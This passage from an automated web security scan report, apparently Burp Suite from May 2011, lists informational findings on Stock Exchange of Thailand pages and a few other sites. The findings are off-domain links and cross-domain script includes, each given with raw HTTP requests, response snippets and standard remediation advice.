<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=442"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=429"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=420"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://www.dcs-digital.com/setweb/ondemand.php?onid=448"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=408"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=383"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=415"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=425"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=440"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=407"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=431"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=387"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=377"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=428"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=379"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=392"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=410"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://www.dcs-digital.com/setweb/ondemandnew.php?onid=447"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=418"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=395"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=375"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=439"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=438"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=413"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=365"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=380"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=405"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=417"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=443"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=411"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=434"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=409"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=433"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=388"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=364"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=370"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=366"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://www.dcs-digital.com/setweb/ondemandnew.php?onid=446"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=385"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=414"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=382"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=416"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=399"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=435"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=432"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=393"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=436"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=372"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=381"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=401"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=437"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=400"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=378"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td valign="top" class="leftmenu"><a href="http://portal.settrade.com/C17_ResearchList.jsp" target="_blank" class="leftmenu">Research by MOU : KGI - mai - CGS (Search by source : mai by CGS / KGI) </a>
...[SNIP]...
<td valign="top"><a href="http://portal.settrade.com/C17_ResearchList.jsp" target="_blank"><img src="/images/company/research_mai.gif" alt="........... MOU : KGI - mai - CGS " width="140" height="90" border="0">
...[SNIP]...

  <a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=250&username=setwebadmin"><img src="http://s7.addthis.com/static/btn/v2/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

13.12. http://www.set.or.th/set/xcalendar.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/xcalendar.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.set.or.th/set/xcalendar.do?language=en&country=US

The response contains the following links to other domains:

http://feeds.feedburner.com/Setorth-Xd
http://feeds.feedburner.com/Setorth-Xr
http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://s7.addthis.com/static/btn/v2/lg-share-en.gif
http://www.addthis.com/bookmark.php?v=250&username=setwebadmin
http://www.google-analytics.com/urchin.js

Request

GET /set/xcalendar.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

14. Cross-domain script include previous next
There are 21 instances of this issue:

http://marketdata.set.or.th/mkt/ftsequotation.do
http://marketdata.set.or.th/mkt/sectorquotation.do
http://marketdata.set.or.th/mkt/stockquotation.do
http://weblink.settrade.com/brokerpage/IPO/images/right_menu/r_menur-02.gif
http://www.maysville-online.com/favicon.ico
http://www.moneychannel.co.th/
http://www.mymemorysafe.com/Subscription.aspx
http://www.sec.or.th/view/truehitsstat.jsp
http://www.set.or.th/chalard_orm/chalard_orm.html
http://www.set.or.th/en/about/holidays/holidays_p1.html
http://www.set.or.th/en/products/bonds/bonds_p1.html
http://www.set.or.th/nicepage_404.html
http://www.set.or.th/search.html
http://www.set.or.th/set/eventdetail.do
http://www.set.or.th/set/memberlist.do
http://www.set.or.th/set/newsdetails.do
http://www.set.or.th/set/newslist.do
http://www.set.or.th/set/newsrelease.do
http://www.set.or.th/set/oppdaybyperiod.do
http://www.set.or.th/set/xcalendar.do
http://www.set.or.th/setresearch/setresearch.html

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

14.1. http://marketdata.set.or.th/mkt/ftsequotation.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://marketdata.set.or.th
Path:	/mkt/ftsequotation.do

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/urchin.js

Request

Response

14.2. http://marketdata.set.or.th/mkt/sectorquotation.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://marketdata.set.or.th
Path:	/mkt/sectorquotation.do

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:24:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Content-Length: 104564

<html>
<head>
<link href="/mkt/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

14.3. http://marketdata.set.or.th/mkt/stockquotation.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://marketdata.set.or.th
Path:	/mkt/stockquotation.do

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/urchin.js

Request

Response

14.4. http://weblink.settrade.com/brokerpage/IPO/images/right_menu/r_menur-02.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weblink.settrade.com
Path:	/brokerpage/IPO/images/right_menu/r_menur-02.gif

Issue detail

The response dynamically includes the following script from another domain:

http://hits.truehits.in.th/data/d0004757.js

Request

GET /brokerpage/IPO/images/right_menu/r_menur-02.gif HTTP/1.1
Host: weblink.settrade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://weblink.settrade.com/actions/customization/IPO/setIndexHome.jsp
Cookie: JSESSIONID=B3D33725D7B4387448AD706D530F305A.tcipo2

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 14:59:14 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 2547

<html>
<head>
<title>SETTRADE.COM - Leading Technology for Professional Investors</title>
</head>
<body>
<center>
<table width=650 cellpadding=0 cellspacing=2 border=0>
<tr><td width=1% valign=top><a
...[SNIP]...
</SCRIPT>
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/d0004757.js"></SCRIPT>
...[SNIP]...

14.5. http://www.maysville-online.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://adsys.townnews.com/creative/maysv-www2.maysville-online.com/top_homes/static.js
http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://e.yieldmanager.net/script.js
http://edge.quantserve.com/quant.js
http://images.townnews.com/leetemplates.com/app/images/omniture/maysville.js
http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js

Request

GET /favicon.ico HTTP/1.1
Host: www.maysville-online.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4639384
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 17:36:18 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.587
X-PHP-Engine: enabled
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp10
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 35267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="shortcut icon" type="image/x-icon" href="http://www.maysville-online.com/content/" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script src="http://e.yieldmanager.net/script.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js"></script>
...[SNIP]...
<div id="top-real-estate" style="float:left; width:160px;">
   <script type="text/javascript" src="http://adsys.townnews.com/creative/maysv-www2.maysville-online.com/top_homes/static.js"></script>
...[SNIP]...
<div id="blox-omniture" class="hide">

           <script type="text/javascript" src="http://images.townnews.com/leetemplates.com/app/images/omniture/maysville.js"></script>
...[SNIP]...

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

14.6. http://www.moneychannel.co.th/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moneychannel.co.th
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://hits.truehits.in.th/data/t0029797.js

Request

GET / HTTP/1.1
Host: www.moneychannel.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/contact/contact.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:25:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: .ASPXANONYMOUS=Acw*9R02GLg0MDc1YzA2YS0wNjE1LTQ1NjMtOTdlMy1hZmI5MjQwNGNhYWU1; expires=Tue, 12-Jul-2011 01:05:27 GMT; path=/;HttpOnly
Set-Cookie: language=en-US; path=/;HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 145560

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD id="Head">
       <TITLE>
           Money Channel ...............................................................................
...[SNIP]...

<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/t0029797.js"></SCRIPT>
...[SNIP]...

14.7. http://www.mymemorysafe.com/Subscription.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mymemorysafe.com
Path:	/Subscription.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.statcounter.com/counter/counter.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:19:20 GMT
Content-Length: 32413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

14.8. http://www.sec.or.th/view/truehitsstat.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sec.or.th
Path:	/view/truehitsstat.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://hits.truehits.in.th/data/m0023906.js

Request

Response

14.9. http://www.set.or.th/chalard_orm/chalard_orm.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/chalard_orm/chalard_orm.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://www.google-analytics.com/urchin.js

Request

GET /chalard_orm/chalard_orm.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=38

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:52:45 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 06:45:17 GMT
ETag: "ccd59-1f3b-7ba45940"
Accept-Ranges: bytes
Content-Length: 7995
Content-Type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
<title>........................... : ........
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

14.10. http://www.set.or.th/en/about/holidays/holidays_p1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/en/about/holidays/holidays_p1.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/urchin.js

Request

GET /en/about/holidays/holidays_p1.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/regulations/cg/roles_p1.html
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:06:40 GMT
Server: Apache
Last-Modified: Tue, 22 Feb 2011 13:25:12 GMT
ETag: "dc70b-9c80-e8f6be00"
Accept-Ranges: bytes
Content-Length: 40064
Content-Type: text/html

<html>
<head>

<title>The Stock Exchange of Thailand: Your Inves
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

14.11. http://www.set.or.th/en/products/bonds/bonds_p1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/en/products/bonds/bonds_p1.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/urchin.js

Request

GET /en/products/bonds/bonds_p1.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/contact/contact.html
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:24:47 GMT
Server: Apache
Last-Modified: Fri, 09 Jul 2010 09:51:33 GMT
ETag: "7800a5-65b3-5912d340"
Accept-Ranges: bytes
Content-Length: 26035
Content-Type: text/html

<html>
<head>

<title>The Stock Exchange of Thailand - Products
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

14.12. http://www.set.or.th/nicepage_404.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/nicepage_404.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://www.google-analytics.com/urchin.js

Request

GET /nicepage_404.html HTTP/1.1
Host: www.set.or.th
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=E578A525.1; _ctout23453=1; __utma=96623517.1603956337.1304462201.1304462201.1304462201.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304462201.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 17:37:06 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 08:51:20 GMT
ETag: "498e9e-33cf-de27d200"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

14.13. http://www.set.or.th/search.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/search.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/coop/cse/brand?form=cse-search-box&lang=th

Request

GET /search.html HTTP/1.1
Host: www.set.or.th
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/shortcut-en.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
